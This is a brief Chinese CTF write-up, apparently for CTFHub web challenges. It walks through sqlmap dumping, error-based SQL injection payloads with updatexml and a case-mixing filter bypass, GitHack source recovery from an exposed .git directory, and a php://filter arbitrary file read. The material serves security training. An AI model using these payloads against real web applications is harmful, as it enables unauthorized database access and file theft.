sql注入1
sqlmap直接扫描
获取库名(note)
--dbs
获取表名fl4g
-D note --tables
获取数据
-D note -T fl4g columns --dump
sql注入2
sqlmap是跑不出来的
右击查看一下页面源代码
在登录页面进行抓包,发送到repeater
按照要求加入?tips=1
提示错误,使用正常payload
name=1'and updatexml(1,concat(0x7e,(select 1 from dual)),1)--+&pass=123456
提示有sql语句错误,发现是select被过滤了,尝试下大小写绕过
可以正常回显,尝试获取表名
name=1' and updatexml(1,(concat(1,(seLECT group_concat(table_name) from information_schema.tables where table_schema =database()))),2) --+&pass=123456
发现fl4g,获查询字段
name=1'and updatexml(1,concat(1,(sELECT group_concat(column_name) from information_schema.columns where table_name='fl4g')),1)--+&pass=123456
获取内容
name=1'and updatexml(1,concat(1,(sELECT flag from fl4g)),1)--+&pass=123456
粗心的小李(git测试)
既然是git测试就可以用githack
python2 GitHack.py http://challenge-7b29cd3b4959be00.sandbox.ctfhub.com:10800/.git
在dist文件夹中会出现一个以url命名的文件夹,点开有一个html
打开网页
afr-1
改一下p=hello查看情况
空白页,那就看一下flag有没有
有回显那就任意文件读取
?p=php://filter/read=convert.base64-encode/resource=flag
base64解码
afr-2
查看页面源代码
查看img上一级目录
发现flag,打开